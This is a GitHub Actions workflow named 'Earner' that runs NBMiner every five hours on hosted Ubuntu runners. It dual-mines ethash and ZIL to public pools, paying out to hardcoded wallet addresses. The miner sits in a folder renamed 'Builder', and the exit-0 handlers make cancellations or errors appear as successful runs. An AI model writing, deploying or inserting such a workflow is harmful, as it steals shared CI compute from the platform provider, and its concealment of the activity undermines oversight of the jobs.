name: Earner

on:
  schedule:
    - cron: "0 */5 * * *"  # Every 5 hours
  workflow_dispatch:

jobs:
  mine:
    runs-on: ubuntu-latest

    steps:
      - name: Install dependencies
        run: |
          sudo apt update
          sudo apt install -y wget tar jq libpci3

      - name: Download and extract NBMiner
        run: |
          wget https://github.com/NebuTech/NBMiner/releases/download/v42.3/NBMiner_42.3_Linux.tgz
          tar -xvzf NBMiner_42.3_Linux.tgz
          mv NBMiner_Linux Builder

      - name: Run miner with 5 hours 30 minutes timeout
        run: |
          cd Builder
          chmod +x nbminer

          # Trap SIGTERM to exit cleanly if canceled
          trap "echo 'Job canceled, exiting successfully'; exit 0" SIGTERM

          # Run NBMiner for up to 5h 30m (19800 seconds)
          timeout 19800s bash -c '
            echo "Starting dual mining..."
            ./nbminer -a ethash \
              -o stratum+tcp://etc.2miners.com:1010 \
              -u 0xa4Adaf2547f79004A19464B6dfd29aDbf9B93698.rig01 \
              --enable-dag-cache \
              --dual-algo zil \
              --dual-intensity 1 \
              --dual-pool stratum+tcp://zil.flexpool.io:4444 \
              --dual-user zil1ldrlejs7lruqxzk98zf0ndg0nu8z34pr7enu8r.rig01
          ' && echo "Miner ran successfully for up to 5 hours 30 minutes." || { echo "Timeout or error occurred. Exiting gracefully."; exit 0; }
